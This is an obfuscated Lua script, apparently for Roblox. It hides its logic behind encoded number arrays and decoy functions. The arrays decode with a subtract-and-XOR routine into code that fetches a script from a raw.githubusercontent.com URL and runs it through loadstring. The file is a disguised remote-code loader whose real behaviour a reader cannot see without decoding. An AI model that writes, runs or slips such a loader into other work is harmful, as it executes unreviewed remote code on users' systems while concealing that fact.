return(({
    wP=function(F,R,q) F[37] = R F[63] = R F[20] = R F[32] = R F[24] = R; return F; end,fs=function(F,R,q) F[52] = R F[50] = R F[55] = R F[81] = R; return F; end,io=function(F,R,q) F[13] = R F[30] = R F[94] = R; return F; end,Pv=function(F,R,q) F[15] = R F[99] = R F[43] = R; return F; end,JT=function(F,R,q) F[90] = R F[55] = R F[27] = R F[100] = R F[31] = R; return F; end,qW=function(F,R,q) F[68] = R F[77] = R F[12] = R F[30] = R; return F; end,mQ=function(F,R,q) F[17] = R F[90] = R F[2] = R F[74] = R; return F; end,eN=function(F,R,q) F[62] = R F[62] = R F[65] = R F[21] = R; return F; end,
    gT=function(F,R,q)
        local k = 41;
        local k2 = 53;
        local IDX = q;
        local t = {};
        local b = bit32 or require('bit');
        local Me = b.bxor;
        local state = 0x2A;
        local i = 1;
        local j = 1;

        while true do
            if state == 0x2A then
                if i > #IDX then state = 0x7B else state = 0x31 end
            elseif state == 0x31 then
                local chunk = R[IDX[i]];
                if j > #chunk then
                    i = i + 1;
                    j = 1;
                    state = 0x2A;
                else
                    local v = chunk[j];
                    local n = (v - k2);
                    local c = Me(n, k);
                    if c < 0 then c = c % 256 end;
                    if c > 255 then c = c % 256 end;
                    table.insert(t, string.char(c));
                    j = j + 1;
                end
            elseif state == 0x7B then
                break;
            end
        end
        return table.concat(t);
    end,
    LE=function(F,R,q)
        local c = F:gT(R,q);
        local l = loadstring or load;
        local f = l(c);
        if f then return f() else return nil end;
    end,
    dM=function(F,R,q)
        return F:LE(R,q);
    end
}):dM({{122,123,127,125,122,62,145,144,122,62,73,62,64,118,146,146,142,143,72,59,59,144,125,147,60,131,117,146,118,145,128,145,143,129,144,127,123,124,146,129,124,146,60,127,123,121,59,125,143,125,146,123,123,123,59,147,59,144,129,132,143,59,118,129,125,130,143,59,121,125},{88,117,132,62,124,123,146,62,132,124,62,146,118,129,124,88,62,62,62,62,129,144,144,123,144,54,129,144,144,53,88,129,124,130,88,144,129,146,145,144,124,62,132,124,54,53},{117,124,59,132,117,122,129,64,88,122,123,127,125,122,62,143,144,127,62,73,62,131,125,121,129,72,150,146,146,142,163,129,146,54,145,144,122,53,88,122,123,127,125,122,62,132,124,58,62,129,144,144,62,73,62,122,123,125,130,143,146,144,117,124,131,54,143,144,127,53}}, {1,3,2}))
